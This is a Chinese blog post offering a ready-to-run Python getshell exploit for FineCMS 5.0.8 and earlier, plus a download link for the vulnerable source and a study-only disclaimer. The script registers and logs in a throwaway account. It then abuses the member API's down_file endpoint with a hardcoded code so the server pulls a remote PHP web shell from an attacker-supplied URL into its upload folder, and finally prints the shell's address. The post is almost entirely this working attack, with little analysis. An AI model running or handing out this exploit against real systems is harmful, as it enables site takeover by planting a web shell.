FineCMS5.0.8及版本以下漏洞Getshell脚本

  • 内容
  • 相关

finecms_down5.png

自行复现

import sys
import random
import requests
import json
import time

def exploit(target,rtarget):
    username = random.randint(0, 999999)
    seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    email = []
    for i in range(8):
        email.append(random.choice(seed))
    email = ''.join(email)

    # step 1 register
    register_url = target + "/index.php?s=member&c=register&m=index"
    register_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[password2]": "123456",
                        "data[email]": email + "@" + email + ".com"}
    # step 2 login
    login_url = target + "/index.php?s=member&c=login&m=index"
    login_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[auto]": "1"}

    url = target+"/index.php?s=member&c=api&m=down_file"
    payload = {"url":"code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi","file":rtarget}
    # step 3 start hacking"
    s = requests.session()
    s.post(register_url, data=register_payload)
    s.post(login_url, data=login_payload)
    res=s.post(url,data=payload).content
    hjson = json.loads(res)
    if "php" in res:
        print "shell:"+target+"/uploadfile/"+time.strftime("%Y%m")+"/"+hjson['name']
    else:
        print "failure"

if len(sys.argv)<5:
    print 'python down_file_getshell.py -h http://127.0.0.1 -r http://10.0.0.1/shell.php'
else:
    target = sys.argv[2]
    rtarget = sys.argv[4]
    exploit(target,rtarget)



  文件名稱:FineCMS5.0.8源码

  更新時間:2018-03-01

  下載声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全。

立即下載

下载链接

网盘下载

本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全。

本文标签:

版权声明:若无特殊注明,本文皆为《南柯一梦》原创,转载请保留文章出处。

本文链接:FineCMS5.0.8及版本以下漏洞Getshell脚本 - https://www.nkymbk.cn/post-308.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知
00:00 / 00:00
顺序播放